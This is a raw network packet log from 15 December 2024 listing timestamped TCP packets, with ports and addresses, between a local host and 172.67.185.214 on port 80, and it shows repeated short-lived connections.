Dec 15, 2024 04:17:59.983851910 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:00.216905117 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:00.337445021 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:00.337493896 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:00.337526083 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:00.948698044 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:00.997900009 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:01.199095011 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:01.247916937 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:01.323892117 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:01.443675995 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:01.443766117 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:01.443942070 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:01.563713074 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:01.797174931 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:02.060420036 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:02.123507977 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:02.123543978 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:02.123574018 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:02.180973053 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:02.530371904 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:02.576021910 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:02.829961061 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:02.873090029 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:02.952631950 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:02.953582048 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:03.073709011 CET	80	49784	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:03.073786020 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:03.073885918 CET	49784	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:03.073893070 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:03.074174881 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:03.194329977 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:03.420119047 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:03.540709972 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:03.540754080 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:03.540786028 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.226675987 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.279171944 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.358678102 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.359132051 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.479357004 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.479453087 CET	80	49790	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.479594946 CET	49790	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.479599953 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.481236935 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.481334925 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.486196041 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.601566076 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.606472969 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.606698990 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.606820107 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.727200985 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.826153994 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:04.946621895 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.946666002 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:04.951395988 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:05.071964979 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.072006941 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.072036028 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.565924883 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.622951984 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:05.692956924 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.748083115 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:05.818264961 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.876518011 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:05.954385996 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:05.998207092 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.077212095 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.077538967 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.078255892 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.198143005 CET	80	49793	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:06.198369026 CET	49793	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.198617935 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:06.198662043 CET	80	49797	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:06.198806047 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.198931932 CET	49797	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.199029922 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.319591999 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:06.545017004 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:06.665268898 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:06.665312052 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:06.665340900 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:07.285881996 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:07.326102018 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:07.542258978 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:07.542690992 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:07.663522959 CET	80	49798	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:07.663608074 CET	49798	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:07.668792963 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:07.788981915 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:07.789232969 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:07.789426088 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:07.909359932 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:08.138839960 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:08.259512901 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:08.259557009 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:08.259589911 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:08.874358892 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:08.919897079 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.106972933 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:09.154337883 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.231462955 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.232063055 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.351937056 CET	80	49804	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:09.351959944 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:09.352170944 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.352180004 CET	49804	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.352389097 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.472306013 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:09.701319933 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:09.821311951 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:09.821374893 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:09.821405888 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:10.439196110 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:10.482616901 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.687995911 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:10.732290030 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.812027931 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.813065052 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.827524900 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.932432890 CET	80	49809	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:10.932588100 CET	49809	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.932832003 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:10.932936907 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.933152914 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.947269917 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:10.947369099 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:10.947509050 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:11.053211927 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:11.067209959 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:11.279407024 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:11.294915915 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:11.399652958 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:11.399692059 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:11.399744034 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:11.414840937 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:11.415055990 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.018999100 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.033067942 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.076257944 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.078130007 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.263269901 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.264079094 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.266921997 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.268378973 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.310519934 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.384422064 CET	80	49814	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.388197899 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.388238907 CET	49814	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.388892889 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.508590937 CET	80	49813	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.508678913 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.508796930 CET	49813	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.508836031 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.509071112 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.628858089 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.857382059 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:12.978295088 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.978337049 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:12.978365898 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:13.594928980 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:13.638683081 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:13.839435101 CET	80	49817	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:13.888668060 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:13.968034029 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:14.088190079 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:14.088300943 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:14.088464975 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:14.208534956 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:14.435691118 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:14.555778027 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:14.555865049 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:14.555896044 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:15.176053047 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:15.216703892 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.425146103 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:15.466887951 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.547327995 CET	49817	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.552464008 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.553488970 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.672982931 CET	80	49823	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:15.673203945 CET	49823	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.673613071 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:15.673819065 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.674077034 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:15.794100046 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:16.030282021 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:16.150561094 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:16.150580883 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:16.150595903 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:16.772150993 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:16.826036930 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.023122072 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.076042891 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.150087118 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.151004076 CET	49830	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.270313978 CET	80	49829	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.270406008 CET	49829	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.270819902 CET	80	49830	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.270903111 CET	49830	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.276628017 CET	49830	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.280066013 CET	49830	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.281162977 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.396411896 CET	80	49830	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.402458906 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.402900934 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.402983904 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.403261900 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.442647934 CET	80	49830	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.522232056 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.522387981 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.522432089 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.522887945 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.642124891 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.748027086 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.867989063 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.868021965 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.873066902 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:17.992952108 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.992969036 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:17.992985010 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:18.162759066 CET	80	49830	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:18.162874937 CET	49830	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:18.505453110 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:18.560569048 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:18.607218027 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:18.654392958 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:18.748054028 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:18.794909954 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:18.847136021 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:18.888597965 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.039071083 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.039263010 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.039895058 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.159271002 CET	80	49831	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:19.159414053 CET	49831	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.159650087 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:19.159749031 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.159778118 CET	80	49835	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:19.159828901 CET	49835	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.159919977 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.279726028 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:19.513946056 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:19.633831024 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:19.633857012 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:19.633872032 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:20.307750940 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:20.357314110 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:20.549875975 CET	80	49838	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:20.607419014 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:20.672204971 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:20.792237997 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:20.795010090 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:20.795253992 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:20.915119886 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:21.154557943 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:21.274749041 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:21.274789095 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:21.274817944 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:21.880856037 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:21.928827047 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.127737045 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:22.169888973 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.284476042 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.285315990 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.406239033 CET	80	49845	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:22.406260014 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:22.406409979 CET	49845	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.406483889 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.406483889 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.526492119 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:22.763765097 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:22.884047985 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:22.884067059 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:22.884080887 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:23.492469072 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:23.544881105 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:23.740246058 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:23.766415119 CET	49852	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:23.794912100 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:23.886217117 CET	80	49852	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:23.886307001 CET	49852	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:23.886410952 CET	49852	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:23.931996107 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:23.932228088 CET	49852	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:23.982294083 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.006077051 CET	80	49852	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.056673050 CET	49838	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.057250977 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.057687998 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.094636917 CET	80	49852	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.177459955 CET	80	49851	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.177546024 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.177635908 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.177651882 CET	49851	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.177791119 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.297626972 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.529292107 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:24.649569988 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.649590015 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.649601936 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.779182911 CET	80	49852	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:24.779391050 CET	49852	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.265430927 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:25.310416937 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.516474009 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:25.560415983 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.635189056 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.635912895 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.757544041 CET	80	49857	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:25.757564068 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:25.757720947 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.757720947 CET	49857	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.757853031 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:25.877623081 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:26.123115063 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:26.243406057 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:26.243451118 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:26.243480921 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:26.843604088 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:26.888730049 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.091243982 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:27.138655901 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.218636990 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.219603062 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.339262962 CET	80	49859	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:27.339356899 CET	49859	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.339482069 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:27.339580059 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.339802027 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.459861994 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:27.685726881 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:27.812540054 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:27.812576056 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:27.812606096 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:28.424283981 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:28.466813087 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.665174961 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:28.716820002 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.795814037 CET	49864	80	192.168.2.4	172.67.185.214
